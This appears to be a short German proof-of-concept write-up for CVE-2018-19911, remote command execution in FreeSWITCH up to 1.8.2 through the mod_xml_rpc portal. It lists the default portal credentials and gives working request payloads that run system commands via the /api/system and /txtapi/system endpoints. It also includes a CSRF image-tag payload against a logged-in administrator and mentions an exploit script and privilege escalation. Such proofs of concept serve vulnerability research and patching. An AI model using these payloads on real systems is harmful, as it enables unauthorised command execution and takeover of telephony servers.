
freeswitch alle Versionen Remote-Befehlausführung (CVE-2018-19911)
version:<=1.8.2
Modul:mod_xml_rpc
Ich habe insgesamt drei Versionen getestet.(Download-URL:http://files.freeswitch.org/)
Installieren Sie freeswitch1.5.15 Windows-Version(http://files.freeswitch.org/windows/installer/x64/freeswitch.msi)
Öffnen Sie die Konsole und geben Sie ein: load mod_xml_rpc (lädt das freeswitch-Portal)
Greifen Sie auf den lokalen Port 8080 zu,
http://127.0.0.1:8080/portal/index.html
Eingabe in der Konsole
```oder```api("bg_system calc")

Sie können auch direkt die Schnittstelle aufrufen
http://127.0.0.1:8080/txtapi/system?calc oder
http://127.0.0.1:8080/api/system?calc



Das Standardkonto und -passwort für das freeswitch-Portal ist freeswitch:works
Sie können es selbst mit freeswitch_rce.py überprüfen
Oder verwenden Sie csrf, um den angemeldeten Administrator anzugreifen.
<img src="http://127.0.0.1:8080/api/system?calc">

Da freeswitch oft mit hohen Privilegien läuft, kann es auch den Effekt einer Privilegienausweitung erzielen.